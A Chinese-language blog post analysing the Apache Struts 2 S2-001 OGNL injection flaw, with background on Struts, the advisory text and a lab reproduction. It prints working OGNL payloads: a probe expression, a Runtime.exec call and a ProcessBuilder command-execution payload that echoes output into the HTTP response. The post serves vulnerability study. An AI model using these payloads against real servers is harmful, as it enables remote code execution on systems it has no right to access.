Apache Struts系列 s2-001漏洞分析

一直想写,但要学的太多，没办法静下来分析，刚好趁着居家办公，分析分析，但是还没涉及到具体代码调用链，所以算是比较失败的一次写作,此次尝试固定写法,以及规范写文的测试。后期应该会完善此文

什么是Struts

Apache Struts 是一个免费的开源 MVC 框架，用于创建优雅的现代 Java Web 应用程序。它有利于约定优于配置，可使用插件架构进行扩展，并附带支持 REST、AJAX 和 JSON 的插件。

什么是Struts 2

个人看法是struts 2系列版本 官方对struts 版本划分很奇怪，从2.x.x开始，后续都是2开头的版本迭代，后面忽略345开头，直接就到6.0.x开头了
所以我们之前的struts2 就是struts 系列的漏洞 现有的一些洞 s2-0xx 是struts官方给的编号所以称谓解释差不多就这样

Struts 2 漏洞一览

表中只涉及大部分漏洞而非全部。

Struts 2 请求周期

深入浅出²
https://blog.csdn.net/melodysky/article/details/52381632

漏洞分析

S2-001

s2-001³ wiki如是说到

问题
WebWork 2.1+ 和 Struts 2 的“altSyntax”功能允许将 OGNL 表达式插入到文本字符串中并进行递归处理。这允许恶意用户通常通过 HTML 文本字段提交包含 OGNL 表达式的字符串，如果表单验证失败，服务器将执行该表达式。例如，假设我们有
这样的表单，要求“phoneNumber”字段不能为空：



</s:form>
用户可以将“phoneNumber”字段留空以触发验证错误，然后用 %{1+1} 填充“name”字段。当表单重新显示给用户时，“名称”字段的值将为“2”。原因是值字段在默认情况下被处理为 %{name}，并且由于 OGNL 表达式是递归计算的，因此它的计算就像表达式是 %{%{1+1}} 一样。
OGNL 解析代码实际上是在 XWork 中，而不是在 WebWork 2 或 Struts 2 中。

实际测试中，并没有因为不留空问题导致表达式没有执行，反而都能执行。

上面所说，OGNL 表达式是递归计算的，漏洞存在的原因是OGNL是XWork组件的功能。
提到了OGNL表达式
so 开始学OGNL表达式⁴:
OGNL 解析：
struts中用%{}指出，其内部是一个ognl表达式https://blog.csdn.net/weixin_42565135/article/details/89220845

复现：

环境：https://github.com/twosmi1e/S2-001

分析：
按照官方说法，任意字段留空，然后出发验证错误，使用OGNL表达式实现rce

实际测试中，并没有因为不留空问题导致表达式没有执行，反而都能执行。

payload: %{3*33}

submit

即可验证漏洞存在，如何RCE？
回归到之前的OGNL表达式

%{#runtime=@java.lang.Runtime.getRuntime(),#runtime.exec(\"open /Applications/Calculater.app\")}

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),
#f.getWriter().close()}

参考

• [1] Apache Struts 2 漏洞汇总 - 馒头/ - 博客园

• [2] 深入浅出struts2

• [3] Apache Struts 2 维基百科

• [4] OGNL - Apache Commons OGNL - Language Guide

• [5] S2-001漏洞分析